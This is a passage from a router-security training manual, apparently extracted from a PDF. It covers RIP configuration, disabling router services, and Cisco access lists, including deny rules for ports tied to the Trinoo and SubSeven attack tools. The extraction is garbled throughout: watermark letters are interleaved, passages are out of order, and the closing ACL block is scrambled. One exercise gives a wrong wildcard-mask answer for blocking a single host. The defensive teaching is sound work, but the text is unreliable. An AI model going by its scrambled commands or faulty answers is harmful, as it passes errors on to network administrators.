The most common routed protocol of today (and of the last decade) is the Internet Protocol, or IP. Other routed protocols are Novells IPX/SPX (Microsofts version of IPX/SPX is NWLink), and AppleTalk. TCP/IP, IXP/SPX, and AppleTalk all allow for addressing at the Network layer of the OSI model.
AT
Routed protocols are those that have the given information so that user data may have an addressing method to use in the transportation of data between and across networks. The routed protocols have enough internal information to dene the structure and function of various elds inside a given packet.
Ed
iti
One area where people tend to have confusion when dealing with routers is the difference between routed protocols and routing protocols. They are distinctly different. In this section, you will learn to differentiate between the two and draw the boundaries clearly around them so that you can easily and quickly identify one or the other.
on
The Routing Protocols

The last area to cover in this topic is the actual protocols themselves. Here, we will discuss the common types of protocols, and look at some examples of the protocols in action. The two common types of protocols are Distance Vector and Link-State. Regardless of whether the protocol is Distance Vector or Link-State, for dynamic routing to function, two critical router functions must exist: An updated and consistent routing table. Scheduled updates between routers.
The frequency of updates between routers.
The amount of data contained in the updates.
Calculation of the different data paths, and ultimately choosing the most efficient one based on the given protocol, requires a dened formula. The formula in the case of routers is known as a routing algorithm. The routing algorithm is responsible for the actual calculation on determining the path the data will take as it moves throughout the network. To make this calculation, the algorithm must use certain variables to create what is known as a metric. The metric is then what is used in path determination. Some of the variables that are used to crate the overall metric of a given path are: Hop CountThis is the number of routers that a data packet must go through to reach its destination. The formula is that the lower the number of hops, the lower the overall data has to travel, and therefore is the better path.
Ed
T DU
The process of nding proper recipients of the router data.
or
DO NO
In
346
st
ru ct

CostThe cost of a link can be dened by the administrator or calculated by the router. Generally the lower the cost, the faster the route. BandwidthThis variable is dened by the overall bandwidth that the link provides. MTU (Maximum Transmission Unit)The MTU is the largest message size (in octets) that a link will route. LoadThis variable is based on the amount of work the CPU has to perform, and the number of packets the CPU must analyze and make calculations on.
Regardless of the routing protocol chosen, there is no single rule for selecting the best protocol based on its algorithm. The routing protocol must change to adapt to the network in the event there are network changes, and both Distance Vector and Link-State have this ability. When the routers change their tables based on this update information from the routing protocol, this is called convergence. When all routers have the same view of the network, the network is converged. It is the goal of all routing protocols to have fast convergence, so that the routers maintain a consistent view of the routes available to network segments, and do not use incorrect data to make routing decisions.
PL
IC
metric: A random variable x representing a quantitative measure accumulated over a period.
AT
iti
For the routing protocols to perform these two critical processes, they must conform to a given set of rules. These rules are part of the operation of the routing protocol. Examples of what rules these protocols can dene include:
on
Distance Vector Routing

Distance Vector routing calculates the distance to a given network segment and the direction (or vector) required to reach the segment. The algorithm of Distance Vector (Bellman-Ford) is designed to pass the routing table from neighbor to neighbor. The passing of the routing table is called the update between routers. In the event there is a topology change, as a router going offline, an update will be sent immediately from one router to another.
Figure 5-10: Routers passing the routing table.
In Distance Vector routing, the routing table is passed between routers along the shared segments. In Figure 5-10, Router A and Router B will share their routing tables over the segment between them, out Interface E2 of Router A and out of Interface E0 of Router B.
Ed
IC PL T DU
or
DO NO
AT
Routing Table with Hop Counts
When the routers receive an update, they add any new information on how to get to new routes, or better paths (lower hop counts) to known routes. The algorithm adds one hop to the hop count for every hop that must be crossed to reach the destination. Figure 5-11 shows a basic routing table with hop count included.
Figure 5-11: A routing table with interfaces dened and hop counts. In this example, the routing table has been created, and convergence has been achieved. Both routers have a consistent view of the network, and the routing tables dene the path to the networks and the interface to forward packets out to reach the required destinations.
In
st
ru ct
E
347
iti
on
topology: The map or plan of the network. The physical topology describes how the wires or cables are laid out, and the logical or electrical topology describes how the information ows.
Routers Passing the Routing Table
Link-State Routing
Where Distance Vector routing uses hop counts to make the decisions in the routing table on path determination, Link-State routing uses a more complex metric system. In Link-State routing, all routers maintain a consistent view of the network, as they do in Distance Vector routing, but they also are all aware of the complete network topology. The Link-State routers know each network segment, and the different options for reaching each segment. Convergence is just as critical in Link-State routing, and in order to have a converged network, there are steps that must be followed. Figure 5-12 shows a complex network, and after the diagram, the steps for convergence will be outlined.
Sample Network for LinkState Routing
Ed or ru ct
2.
Figure 5-12: In this complex network, 7 routers and 14 network segments are dened.
st
3.
In
The routers in the network accept all the LSPs and build a topology database of the network. The LSPs from all routers are used to build this consistent view. The SPF (Shortest Path First) algorithm is used to determine the accessibility of each network and the shortest path between networks. The SPF algorithm
4.
348
DO
The routers send LSP (Link State Packets) to the network. The LSPs contain data on which networks the router can reach. For example, Router 7 would send LSPs indicating that Router 7 is connected to segments 10.0.0.0, 11.0. 0.0, 12.0.0.0, and 14.0.0.0.
NO
The steps for network convergence are as follows: 1. The routers identify the routers that are their direct neighbors. For example, Router 3 will identify Router 6 and Router 4 as neighbors.
DU
PL
IC
AT
iti
on
is executed on all routers, so that they all end up with the same topology view of the network. Each router knows the best path to every segment. 5. The router uses the SPF calculations to determine the best (shortest) path for reaching each destination network on the internetwork.
Here is a quick list of common routing protocols used on Cisco routers: RIP (Routing Information Protocol) is a Distance-Vector protocol that uses hop count as its metric. IGRP (Interior Gateway Routing Protocol) is a routing protocol that uses a combined metric for routing decisions. EIGRP (Enhanced Interior Gateway Routing Protocol) is an enhanced version of IGRP that combines properties of Link-State and Distance Vector protocols. OSPF (Open Shortest Path First) is a Link-State protocol that commonly replaces RIP in growing internetworks.
BGP (Border Gateway Protocol) is an interdomain routing protocol often used by Internet Service Providers.
RTMP (Routing Table Maintenance Protocol) is Apples routing protocol. RTMP routers dynamically update topology changes in the network.
or
DO NO
As the router has the ability to use static routes, dynamic routes, and multiple protocols, the ability to see the current routing table becomes even more critical as the networks complexity increases. There is a function in the router called administrative distance. The administrative distance function has one obvious use, and that is managing when two or more methods in the router are aware of a path to a destination. For example, if you entered a static route on how to get to a location, then RIP identied a route to that location, which route should the router use?
ru ct
Distance
0 1 100 110 120
This is where the administrative distance comes into play. The lower a value, the higher the level of trust the router places in that route. Some default administrative distances are listed in the following table.
DU
PL
Default Administrative Distances
Route Type
Directly connected interface Static route IGRP route OSPF route RIP route
Therefore, if you had a static route and a RIP route, the static route would be the preferred route that the router uses. When viewing the routing table, not only will you be shown the current routes to destination networks, but you will also see the method used. The following conguration fragments show a portion of the routing tables for three routers in a network:
In
st
IC
AT
E
349
Administrative Distances
Ed
iti
on
Common Protocols
Routing Protocols
LEFT#show ip route R 192.168.10.0/24 [120/1] via 192.168.20.2, 00:00:13, Serial1 C 192.168.20.0/24 is directly connected, Serial1 C 172.16.0.0/16 is directly connected, Ethernet0 R 172.17.0.0/16 [120/1] via 192.168.20.2, 00:00:13, Serial1 R 172.18.0.0/16 [120/2] via 192.168.20.2, 00:00:13, Serial1 CENTER#show ip route C 192.168.10.0/24 is directly connected, Serial1 C 192.168.20.0/24 is directly connected, Serial0 R 172.16.0.0/16 [120/1] via 192.168.20.1, 00:00:13, Serial0 C 172.17.0.0/16 is directly connected, Ethernet0 R 172.18.0.0/16 [120/1] via 192.168.10.1, 00:00:18, Serial1 RIGHTt#show ip route C 192.168.10.0/24 is directly connected, Serial0 R 192.168.20.0/24 [120/1] via 192.168.10.2, 00:00:20, Serial0 R 172.16.0.0/16 [120/2] via 192.168.10.2, 00:00:20, Serial0 R 172.17.0.0/16 [120/1] via 192.168.10.2, 00:00:20, Serial0 C 172.18.0.0/16 is directly connected, Ethernet0
or
DO NO
ru ct In
The following conguration fragments show the conguration of RIP on three routers, LEFT, RIGHT, and CENTER:
LEFT#configure terminal LEFT(config)#router rip LEFT(config-router)#network 172.16.0.0 LEFT(config-router)#network 192.168.10.0 LEFT(config-router)^Z LEFT# RIGHT#configure terminal RIGHT(config)#router rip RIGHT(config-router)#network 172.18.0.0
st
RIP functions by informing neighboring routers of the routers that the current router can reach. The current routes are created during the simple conguration process of setting up RIP in the router.
DU
RIP, or the Routing Information Protocol, is one of the most straightforward routing protocols that can be implemented. It also has no signicant security, is broadcast-based, and is noisy.
PL
RIP
IC
AT
For the RIP routes shown, note that the number 120 is displayed in brackets after the route. The 120 is an indicator of the administrative distance of this route. (The number following the slash is the hop count.)
In these fragments, you can identify the routes on each router. You can also identify the routes that are directly connected and the routes that are using RIP. The way that you identify this is by the letter in front of each route. For example, in these examples, all routes with a letter C are connected interfaces. Routes with an R are using RIP. If a route had been input statically, it would have an S in front of it.
Ed
iti
on
RIGHT(config-router)#network 192.168.20.0 RIGHT(config-router)^Z RIGHT# CENTER#configure terminal CENTER(config)#router rip CENTER(config-router)#network 172.17.0.0 CENTER(config-router)#network 192.168.10.0 CENTER(config-router)#network 192.168.20.0 CENTER(config-router)^Z CENTER#
TASK 5B-2
Viewing a RIP Capture
Ed
T DU PL IC
Because RIP is broadcast-based, any host on a segment where RIP broadcasts are sent can receive the update. Only the router has a legitimate routing function, but an attacker can learn valuable information, such as the conguration and addressing of a network.
1. 2. 3. 4. 5. 6.
Open rip update.cap, another capture le located on your course CD-ROM, in the \085545\Data\Captures folder.
Look for the destination address of the packet. Find the IP and MAC destination addresses.
Observe the source address. You can conclude that this is likely the source address of a router in the network. Expand the RIP portion of the frame capture.
st
In order to address some of the issues associated with RIP, RIPv2 was introduced as a routing protocol. A security advantage was the ability to require and use authentication for RIP updates. From a networking perspective, the conguration is very similar to RIPv1, as shown previously. The following conguration fragment shows the same three routers congured to use RIPv2 instead of RIPv1:
In
RIPv2
DO
Examine the network details sent in the packet. Even though you are a random user on the network, you have captured the packet and are able to learn quite a few things about the network in a very short amount of time.
ru ct
Expand frame one, and observe the contents of the packet.
NO
or
Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Network Monitor is running.
AT
E
351
iti
In these fragments, RIP routing has been congured with the networks that each router can reach. For example, the LEFT router will announce that if there is a packet destined for network 172.16.0.0, then the other routers should send it to the LEFT router.
on
st
352
In
All routers that will exchange routing updates on the same network must use the same conguration, so the authentication will match. Once the router is congured, if you were to enter the show running-config command, you would get the following new pieces in the output:
DO
Router#configure terminal Router(config)#interface ethernet0 Router(config-if)#ip rip authentication key-chain 3 Router(config-if)#ip rip authentication mode md5 Router(config-if)#exit Router(config)# interface serial0 Router(config-if)#ip rip authentication key-chain 3 Router(config-if)#ip rip authentication mode md5 Router(config-if)#exit Router(config)# interface serial1 Router(config-if)#ip rip authentication key-chain 3 Router(config-if)#ip rip authentication mode md5 Router(config-if)#^Z Router#configure terminal Router(config)#key chain 3 Router(config-keychain)#key 1 Router(config-keychain-key)#key-string strongpassword Router(config-keychain-key)#^Z Router#
or
NO
ru ct
DU
PL
IC
AT
The authentication used is a key and MD5. The following conguration fragment shows the setup of RIPv2 authentication. In this fragment, rst the router is told that RIP authentication is required, then the key (the word strongpassword) is created.
Ed
CENTER#configure terminal CENTER(config)#router rip CENTER(config-router)#version CENTER(config-router)#network CENTER(config-router)#network CENTER(config-router)#network CENTER(config-router)^Z CENTER#
2 172.17.0.0 192.168.10.0 192.168.20.0
iti
RIGHT#configure terminal RIGHT(config)#router rip RIGHT(config-router)#version 2 RIGHT(config-router)#network 172.18.0.0 RIGHT(config-router)#network 192.168.20.0 RIGHT(config-router)^Z RIGHT#
on
LEFT#configure terminal LEFT(config)#router rip LEFT(config-router)#version 2 LEFT(config-router)#network 172.16.0.0 LEFT(config-router)#network 192.168.10.0 LEFT(config-router)^Z LEFT#
Viewing a RIPv2 Capture
Setup: You are logged on to Windows 2000 as the renamed Administrator account, and Network Monitor is running. 1. 2. 3. 4. 5. 6. 7. 8. Open ripv2withAuthentication.cap, another capture le located on your course CD-ROM, in the \085545\Data\Captures folder. Expand frame one, and observe the contents of the packet.
Ed
T DU PL IC
TASK 5B-3
Look for the destination address of the packet. Find the IP and MAC destination addresses.
Observe the source address. You can conclude that this is likely the source address of a router in the network. Expand the RIP portion of the frame capture.
Examine the network details sent in the packet.
st
Close Network Monitor.
In
DO
NO
Observe the addition of the Authentication portion of the capture and the additional elds not present in the RIPv1 packet.
ru ct
or
AT
E
353
iti
enable secret 5 $1$v13S$Nk8zY5NcYor5VvAfcfZCn0 enable password 2501 ! ! key chain 3 key 1 key-string strongpassword ! interface Ethernet0 ip address 172.16.0.1 255.255.0.0 ip rip authentication mode md5 ip rip authentication key-chain 3 no mop enabled interface Serial0 no ip address shutdown
on
Topic 5C
Removing Protocols and Services
CDP
Ed
T DU
or
DO NO
354
In
st
ru ct
However, it may be desirable to stop CDP only on those interfaces that are not connected directly to another router. Perhaps there is only a direct link between two serial interfaces, and you want to allow CDP to run there, but not on the internal Ethernet network. In the following conguration fragment, CDP is disabled just for the Ethernet interface. Note that the only addition is the dening of the interface, and the command is no cdp enable, instead of no cdp run:
Router#config terminal Router(config)#interface Ethernet 0 Router(config-if)#no cdp enable Router(config-if)#^Z Router#
PL
Router#config terminal Router(config)#no cdp run Router(config)#^Z Router#
IC
AT
In the following conguration fragment, you can see that turning off CDP for the entire router is not a complex set of commandsonly two commands are required:
The Cisco Discovery Protocol (CDP) is a protocol used by Cisco routers to exchange information, such as platform information and status, with each other. In general, CDP can be a useful thing to use when troubleshooting in a simple environment. Unfortunately, like most things that can make our lives as administrators a little easier, CDP can make an attackers job a little easier because it gives out important information such as the IOS version that the router is running. And, of course, knowing what IOS version is running makes an attackers job much easier since he or she will have a much better idea of what exploits will work against such a target.
iti
on
The fundamental concept of hardening the router is no different than hardening Linux or Windows. You must remove all of the protocols and services that are unused. You must congure the required protocols and services so that they are secured for access. In this topic, you will look at removing many of the protocols and services that are often not used on a router and continue to harden the device.
TASK 5C-1
Turning Off CDP
1.
ICMP
st
ICMP Unreachable
Another very common attack is for a potential intruder to scan your system(s) looking for services that are open and that can be exploited. It is common to use ICMP to perform these scans of systems. If you remove the ICMP Unreachable message, be aware that your system will not respond to desired unreachable mes-
In
DO
Router#config terminal Router(config)#interface Ethernet 0 Router(config-if)#no ip directed broadcast Router(config)#interface Serial 0 Router(config-if)#no ip directed broadcast Router(config)#interface Serial 1 Router(config-if)#no ip directed broadcast Router(config-if)#^Z Router#
NO
DU
The following conguration fragment shows the disabling of ICMP directed broadcasts on the Serial 1, Serial 0, and Ethernet 0 interfaces. To protect fully against this attack, you should turn off broadcasts like this on all interfaces.
ru ct
PL
Smurf is an attack that takes advantage of ICMP. Specically, what Smurf does is to get many machines to ood a single host with ICMP packets, effectively shutting down that host. The way this attack works is to ping an entire network, using a spoofed IP address. When every host of the network responds to the IP address, that machine has been attacked. This can easily lead to hundreds of machines responding to a host simultaneously.
or
IC
AT
ICMP Directed Broadcast
ICMP provides, among other functions, the ability to use the often-required ping and traceroute commands. However, ICMP has become one of the most misused of all protocols. DoS and DDoS attacks use ICMP, and more and more attacks take advantage of this function of the network. In this section, only a few examples of hardening ICMP are discussed.
Ed
iti
traceroute: An operation of sending trace packets for determining information; traces the route of UDP packets for the local host to a remote host. Normally traceroute displays the time and location of the route taken to reach its destination.
Router#config terminal Router(config)#interface Ethernet 0 Router(config-if)#no cdp enable Router(config-if)#interface Ethernet 1 Router(config-if)#no cdp enable Router(config-if)#interface Serial 1 Router(config-if)#no cdp enable Router(config-if)#^Z Router#
on
355
Create the conguration fragment that you would use for turning off CDP on Ethernet 0, Ethernet 1, and Serial 1.
sages, such as when your internal users legitimately need them, such as during timeouts. The following conguration fragment shows the disabling of ICMP Unreachable messages on the Serial 0 interface. To remove ICMP Unreachable messages on the entire router, this command needs to be entered for each interface.
Hardening ICMP
1.
or
DO NO
ru ct
Source Routing
In
st
A feature that was added to routers to increase the control administrators had over the network was source routing. This feature has become a vulnerability that attackers now use. Source routing is used to allow a packet to dictate the path it should take through a routed network. This packet does not follow the routing tables as designated by the routing protocols. Doing so may allow an attacker to bypass critical systems, such as a rewall or an IDS. In most situations, there is no need for source routing to be allowed on any router. The conguration fragment that follows shows the disabling of the source routing service:
Router#config terminal Router(config)#no ip source-route Router(config)#^Z Router#
DU
PL
Router#config terminal Router(config)#interface Ethernet 0 Router(config-if)#no ip directed broadcast Router(config-if)#no ip unreachables Router(config)#interface Serial 0 Router(config-if)#no ip directed broadcast Router(config-if)#no ip unreachables Router(config)#interface Serial 1 Router(config-if)#no ip directed broadcast Router(config-if)#no ip unreachables Router(config-if)#^Z Router#
Ed
Create the conguration fragment that you would use to disable ICMP Directed Broadcasts and ICMP Unreachable messages on the entire router, which has the Ethernet 0, Serial 0, and Serial 1 interfaces.
IC
AT
iti
TASK 5C-2
on
Router#config terminal Router(config)#interface Serial 0 Router(config-if)#no ip unreachables Router(config-if)#^Z Router
Small Services
TCP and UDP small services are enabled on some routers by default (generally IOS 11.3 and previous versions). Small services are not often used anymore and include echo, discard, daytime, and chargen. On most routers, be sure to disable these services. The conguration fragment that follows shows the disabling of small services for both TCP and UDP:
Router#config terminal Router(config)#no service tcp-small-servers Router(config)#no service udp-small-servers Router(config)#^Z Router#
Finger
Ed
T DU PL IC
Finger is another older service that is rarely used in modern networks. The Finger service is used to nd information about users who are logged into a router. On older versions of the IOS (11.2 and older), Finger is disabled by using the no service finger command. On newer versions of the IOS (11.3 and newer), Finger is disabled by using the no ip finger command. In the following code, the rst conguration fragment shows the removal of the Finger service from an older router, and the second fragment shows the removal of the Finger service from a newer router:
Router#config terminal Router(config)#no service finger Router(config)#^Z Router# Router#config terminal Router(config)#no ip finger Router(config)#^Z Router#
st
In
DO
ru ct
NO
or
AT
E
357
iti
on
Small services are also known as small servers.
Remaining Services
As a security professional, you know that hardening a piece of equipment means disabling or removing all of the services and protocols that you are not using. In this section, you will see several other services that you should consider disabling for your router. In consideration of space, every service and protocol cannot be listed in this sectiononly several of the signicant services can be highlighted. The BootP service is used to remotely boot computers via the network. This service can be disabled by using the no ip bootp server command. The DNS function is enabled on Cisco routers, but there is no dened name server. The net result is broadcasting for all DNS requests. To disable this function, use the no ip name-server command. The Network Time Protocol (NTP) is used for time synchronization on the network. This service can be disabled by using the no ntp server command. If you want to disable this protocol for only a single interface, the command to use is ntp disable, when you are in the Interface Mode.
ru ct st
In
DO
NO
DU
Router#config terminal Router(config)#no ip bootp server Router(config)#no ip name-server Router(config)#no ntp server Router(config)#no snmp-server Router(config)#no ip http server Router(config)#^Z Router#
or
PL
IC
AT
The conguration fragment that will disable all of the above services will look like this:
HTTP is used on some version of the routers to allow for remote access and management. Unless specically required in your organization, this should be disabled. To disable HTTP, use the no ip http server command.
Ed
When NTP is used in conjunction with syslog services, thus keeping accurate timestamps on log entries, it can be useful for forensic purposes.
The Simple Network Management Protocol (SNMP) is used to communicate between network devices. SNMP left as-is on routers can provide information about the router to attackers. Disable SNMP by using the no snmp-server command.
iti
on
TASK 5C-3
Removing Unneeded Services
1.
Ed
T DU PL IC
Creating Access Control Lists
Access Control Lists (ACLs) enable network administrators to not only control access from a security standpoint, but also can be used to restrict bandwidth use on critical links. In this and the following topic, the discussion will be on IP access lists, but be aware that access lists can exist for other routed protocols, such as AppleTalk and IPX/SPX.
st
In
Extended ACLs are designed to look at both the source and destination packet addresses. Not limited to source IP address, extended lists allow for checking of protocol, port number, and destination address. This additional exibility is the reason that many administrators implement extended lists on their networks.
DO
An ACL is a packet lter that compares a packet with a given set of criteria. The ACL checks the packet and acts upon the packet as dened by the list. Access Control Lists are divided into two main categories, standard and extended. Standard ACLs are designed to look at the source address of a packet that has been received by the router. The result of the list is to either permit or deny the packet based on the subnet, host, or network address. A standard access list takes effect for the full IP protocol stack.
ru ct
NO
or
Topic 5D
AT
packet lter: Inspects each packet for user dened content, such as an IP address, but does not track the state of sessions. This is one of the least secure types of rewall.
E
359
Router#config terminal Router(config)#no cdp run Router(config)#interface Ethernet 0 Router(config-if)#no ip directed broadcast Router(config)#interface Serial 0 Router(config-if)#no ip directed broadcast Router(config)#interface Serial 1 Router(config-if)#no ip directed broadcast Router(config-if)#^Z Router# Router#config terminal Router(config)#no service tcp-small-servers Router(config)#no service udp-small-servers Router(config)#no ip source-route Router(config)#no ip finger Router(config)#^Z Router#
iti
on
Create the conguration fragment that you would use to remove the following services from the whole IOS v12.x router: CDP, ICMP Directed Broadcasts, Small Servers, Source Routing, and Finger. For this exercise, you can assume that the interfaces are named E0, S0, and S1.
Access Control List Operation

The function of an access list is the same internally in the router, whether it is a standard list or an extended list. The process begins the same as a router with no access lists. First, as the packet enters the router, the routing table must be checked. If there is no route, the packet is discarded and a message may be returned to the sender (such as an ICMP destination unreachable message). If the packet is routable, the router must next check to see if the interface that will route the packet has an access list dened. If there is no list, the packet is routed out the appropriate interface. If there is a list dened, the packet is veried through the list to decide if the packet is to be permitted or dropped.
The ACL Process
Ed or ru ct st In
Figure 5-13: The Access Control List process.
The Access List Process
A critical component of access lists is to understand that they operate in sequence, from the top down. In other words, the rst statement of an access lists is checked. If the packet does not match the rules of that statement, then the packet is sent to the next statement, and on and on, until there is a match. Once there is a match, the packet will follow that rule. In the event that there are two rules that can apply to the same packet, whichever rule the packet hits rst is the one that it will follow.
DO
NO
Figure 5-13 illustrates this process. A packet is taken in via Interface E0. In this example, the packet is incoming on Interface Ethernet 0 and destined to be outgoing on Interface Ethernet 1. Because the list is used to determine whether or not the packet is to exit on interface Ethernet 1, this list can be determined to be an outgoing list.
DU
PL
IC
AT
iti
on
There will always be a match, since the end of every access list is an implicit deny, meaning that every list must have at least one permit statement or all packets will be denied! Figure 5-14 shows a graphical example of an access list statement process.
The List Process of an ACL
Ed or
DO NO T DU PL IC
Figure 5-14: The list process of an ACL.
The Wildcard Mask
Wildcard masks are 32-bit values that look like traditional subnet masks, but they do not function in the same manner. A wildcard mask uses the 1s and 0s to match dened bits of an IP address. The rules of the bits of a wildcard mask are as follows: If the wildcard mask bit is a 1, then do not check the corresponding bit of the IP address for a match. If the wildcard mask bit is a 0, then do check the corresponding bit of the IP address for a match.
The chart in Figure 5-15 shows several examples of the wildcard mask checking options. Where there is a 0, the values are checked for a match, and where there is a 1, the value is not checked.
In
st
ru ct
IP access lists use a value known as the wildcard mask to determine whether or not a packet matches a given statement in the list. The wildcard mask uses 1s and 0s to identify the dened IP address(es) for permission or denial.
AT
Wildcard Mask Examples
E
361
iti
on
Figure 5-15: Examples of wildcard masks.
Wildcard Mask Examples
ru ct
Item
IP Network Subnet Mask Wildcard Mask
If the goal is to have an access list statement match an entire network, the following wildcard mask could be used.
NO
st
This tells the router to check only the rst 24 bits of the IP address, and if the decimal value of those bits are 10.15.10, then this access list statement applies to this host. If the goal is to block a specied subnet, the mask requires a bit more calculation, but still functions the same way. In the event that the administrator wants to have subnet 10.15.10.32 match an access list statement, the mask would be as follows. Item
IP Subnet Address
In
DO
362
DU
This tells the router to check every bit of the IP address, and if those bits are 10.15.10.187, then this access list statement applies to this host.
PL
Value Value
10.15.10.32
10.15.10.0 255.255.255.0 0.0.0.255
IC
IP Address Subnet Mask Wildcard Mask
or
Item
Value
10.15.10.187 255.255.255.0 0.0.0.0
AT
If an administrator wanted to have an access list statement match a single host in a network, the following wildcard mask could be used.
Ed
As you can see from this chart, if there were a mask of 11111111, then none of the eight bits of the corresponding IP address would be checked. Likewise, if there were a wildcard mask of 00000000, then all eight bits of the corresponding IP address would be checked.
iti
on
Item
Subnet Mask Wildcard Mask
Value
255.255.255.224 0.0.0.31
TASK 5D-1
Creating Wildcard Masks
1.
If your goal is to block out a single host, such as 192.168.27.93, that uses 255.255.255.0 as the subnet mask, what wildcard mask would you use? 0.0.0.255.
2.
If your goal is to block out a subnet of 10.12.24.0 that uses 255.255.248.0 as the subnet mask, what wildcard mask would you use? 0.0.7.255.
or ru ct
NO T DO
0.0.0.255.
Implementing Access Control Lists
In this topic, we will detail the implementation of and rule-creation for access lists. There will be examples of access lists and their syntax on a Cisco router. Examples will include both standard and extended IP access lists, the most common lists for networks connected to the Internet today. Access Control Lists are implemented in two stages on Cisco routers. The rst stage is to create the list, including all of its statements. The second stage is the implementation of the list on an interface of a router, dening whether the list is to lter packets as an inbound or outgoing list.
Although you have the option of using standard or extended access lists, the extended lists are preferred because they provide more granularity when you are permitting and denying trafc.
Standard Access Control List Command Syntax

To create a standard ACL, the following line shows the proper syntax. Items in italics are variables to be lled in. Router(config)#access-list access-list-number {permit|deny} source [source-mask]
In
st
DU
PL
Topic 5E
IC
AT
E
363
3.
If your goal is to block out network 172.168.32.0 that uses 255.255.255.0 as the subnet mask, what wildcard mask would you use?
Ed
iti
on
This tells the router to check all but the last ve bits of the fourth octet. If the checked bit equals 10.15.10.32, then the access list statement applies to this host.
Where: access-list is the actual command to create a list. access-list-number is a value between 1 and 99, that is selected to create a standard ACL.
source is the value that is the actual source address to match.
source-mask is the value that species the wildcard mask for the dened host.
Router(config-if)#ip access-group access-list-number {in|out}
access-list-number is the value assigned to the actual list to be implemented on this interface.
ru ct

Where: access-list is the actual command to create a list.
permit|deny is the value that denes whether the list will grant or block access. protocol is the value that denes what protocol to lter. source-mask is the value that denes the wildcard mask for the source. destination is the value that denes the destination IP address. destination-mask is the value that denes the wildcard mask for the destination. operator|operand is the value that denes the options for the list. Options include: GTGreater than LTLess than EQEqual to
st
364
In
DO
source is the value that denes the source IP address.
NO
access-list-number is a value between 100 and 199, that is selected to create an extended ACL.
DU
PL
Router(config)#access-list access-list-number {permit|deny} protocol source source-mask destination destination-mask [operator|operand]
IC
To create an extended ACL, the following line shows the proper syntax. Remember, items in italics are variables to be lled in.
or
Extended Access Control List Syntax
AT
in|out is the value that denes whether the list will lter inbound or outbound packets.
Ed
Where: ip access-group is the command to link (implement) a list to an interface.
iti
Once the list has been created, the second stage is to apply the list to an interface. Before you do this, however, make sure that you have specied the interface that you want to be affected by the list. The syntax for list application is shown here. Again, items in italics are variables to be lled in.
on
permit|deny is the value that denes whether the list will grant or block access.
NEQNot Equal to
Once the list has been created, the second stage is to apply the list to an interface. The syntax for list application is shown. As before, items in italics are variables to be lled in. Router(config-if)#ip access-group access-list-number {in|out} Where: ip access-group is the command to link (implement) a list to an interface. access-list-number is the value assigned to the actual list to be implemented on this interface. in|out is the value that denes whether the list will lter inbound or outbound packets.
Ed or ru ct
Figure 5-16: A sample network for ACL implementation.
DU
Sample Network for ACL Implementation
The third line is permitting all trafc not denied by the second line. The word any can be used in place of 0.0. 0.0 255.255.255.255.
st
Denial of a Specific Host
Our rst example will be the simple denial of a dened host into the router. This can be accomplished by using a standard ACL.
Router#configure terminal Router(config)#access-list 23 deny 192.168.10.7 0.0.0.0 Router(config)#access-list 23 permit 0.0.0.0 255.255.255.255 Router(config)#interface Ethernet 0 Router(config-if)#ip access-group 23 in Router(config-if)#^Z Router#
In
The conguration fragment for this example is:
DO
NO
Use Figure 5-16 with the network and host IP addresses dened to look at several examples of access lists. The same gure will be used for all examples, only with different lists, different goals, and different implementations. These examples will be using both standard and extended IP access lists.
PL
IC
AT
E
365
iti
on
Denial of a Subnet
Our second example will be the denial of a dened host out to the Internet and the denial of an entire network to the Internet. This can also be accomplished by using a standard ACL. The conguration fragment for this example is:
The fourth line is permitting all trafc not denied by the second and third lines.
Denial of a Network
Our third example will be the denial of an entire network from another network. This can be accomplished by using a standard ACL. The conguration fragment for this example is:
Router#configure terminal Router(config)#access-list 57 deny 192.168.20.0 0.0.0.255 Router(config)#access-list 57 deny 192.168.10.0 0.0.0.255 Router(config)#access-list 57 permit 0.0.0.0 255.255.255.255 Router(config)#interface Ethernet 0 Router(config-if)#ip access-group 57 out Router(config-if)#interface Ethernet 1 Router(config-if)#ip access-group 57 out Router(config-if)#^Z Router#
Ed
T DU
For the fth line, permit ip any any could be used to shorten the syntax.
st
In
Granting FTP to a Subnet

Our fth example will be granting one subnet the ability to ftp to the Internet, while denying the other subnet. Again, this can be accomplished by an extended ACL, due to the need to control access to individual ports. The conguration fragment for this example is:
366
DO
ru ct
Our fourth example will be limiting the permission of given hosts to telnet to the Internet and the denial of a network telnetting to the Internet. This can be accomplished by using an extended ACL, due to the need to control access to individual ports. The conguration fragment for this example is:
Router#configure terminal Router(config)#access-list 123 permit tcp 192.168.20.16 0.0.0.0 0.0.0.0 255.255.255.255 eq 23 Router(config)#access-list 123 permit tcp 192.168.10.7 0.0.0.0 0.0.0.0 255.255.255.255 eq 23 Router(config)#access-list 123 deny tcp 192.168.0.0 0.0.255.255 0.0.0.0 255.255.255.255 eq 23 Router(config)#access-list 123 permit ip 0.0.0.0 255.255.255.255 0.0.0.0 255.255.255.255 Router(config)#interface Serial 0 Router(config-if)#ip access-group 123 out Router(config-if)#^Z Router#
NO
PL
IC
Granting Telnet from One Specific Host
or
AT
iti
on
Router#configure terminal Router(config)#access-list 45 deny 192.168.10.7 0.0.0.0 Router(config)#access-list 45 deny 192.168.20.0 0.0.0.255 Router(config)#access-list 45 permit 0.0.0.0 255.255.255.255 Router(config)#interface Serial 0 Router(config-if)#ip access-group 45 out Router(config-if)#^Z Router#
Defending Against Attacks with ACLs
Anti-DoS ACLs
or
DO NO
tcp udp udp tcp tcp tcp tcp any any any any any any any any any any any any any any eq eq eq eq eq eq eq
ru ct
160 160 160 160 160 160 160 deny deny deny deny deny deny deny
Router(config)#access-list Router(config)#access-list Router(config)#access-list Router(config)#access-list Router(config)#access-list Router(config)#access-list Router(config)#access-list
27665 31335 27444 6776 6669 2222 7000
In this rst conguration fragment, traffic that is established internally is allowed out, and incoming connections are not able to create new sessions.
In
The TCP SYN attack is where the attacker oods the target host and disallows any legitimate connections to be made by the target host. To work on blocking this, the ACL must allow legitimate TCP connections, which are created by hosts inside the network, but disallow connections to those hosts from outside (like on the Internet).
st
Anti-SYN ACLs
T
DU
PL
In the conguration fragment that follows, the rst section (ports 27665, 31335, 27444) of the list is designed to block the TRINOO DDoS, and the second section (ports 6776, 6669, 2222, 7000) is designed to block the SubSeven DDoS.
IC
These ACLs work by recognizing the protocol and port selection of the DoS attack. It is possible that by using these ACLs, you may block legitimate applications that have chosen the same high port values, so that must be taken into account. In order to prevent hosts inside the network from participating in a DoS on an Internet host, you should consider placing these on all interfaces, in both directions. At the minimum, you will place these lists on the inbound interfaces that are connected to the Internet.
Ed
